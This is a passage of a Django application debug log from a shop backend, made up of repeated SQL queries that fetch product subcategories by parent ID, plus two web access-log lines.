"shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 05:55:13,744 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 05:55:13,747 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 05:55:13,750 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 05:55:13,752 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 05:55:13,754 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 05:55:13,757 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 05:55:13,760 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 05:55:13,763 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 05:55:13,765 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 05:55:13,767 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 05:55:13,770 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 05:55:13,774 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 05:55:13,777 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 05:55:13,780 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 05:55:13,783 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 05:55:13,785 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 05:55:13,788 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 05:55:13,791 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 05:55:13,794 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 05:55:13,796 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 05:55:13,799 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 05:55:13,801 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 05:55:13,805 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 05:55:13,807 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 05:55:13,810 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 05:55:13,812 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 05:55:13,816 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 05:55:13,821 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 05:55:13,823 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 05:55:13,826 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 05:55:13,828 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 05:55:13,830 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 05:55:13,833 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 05:55:13,836 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 05:55:13,838 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 05:55:13,841 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 05:55:13,844 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 05:55:13,846 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 05:55:13] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 05:58:31] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 05:59:05,157 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 05:59:05,165 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 05:59:05,169 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 05:59:05,172 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 05:59:05,177 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 05:59:05,180 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 05:59:05,184 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 05:59:05,186 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 05:59:05,189 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 05:59:05,192 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 05:59:05,196 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 05:59:05,199 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 05:59:05,201 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 05:59:05,204 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 05:59:05,208 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 05:59:05,211 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 05:59:05,213 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 05:59:05,216 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 05:59:05,219 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 05:59:05,225 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 05:59:05,229 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 05:59:05,233 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 05:59:05,236 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 05:59:05,239 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 05:59:05,242 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 05:59:05,245 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 05:59:05,248 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 05:59:05,250 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 05:59:05,253 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", 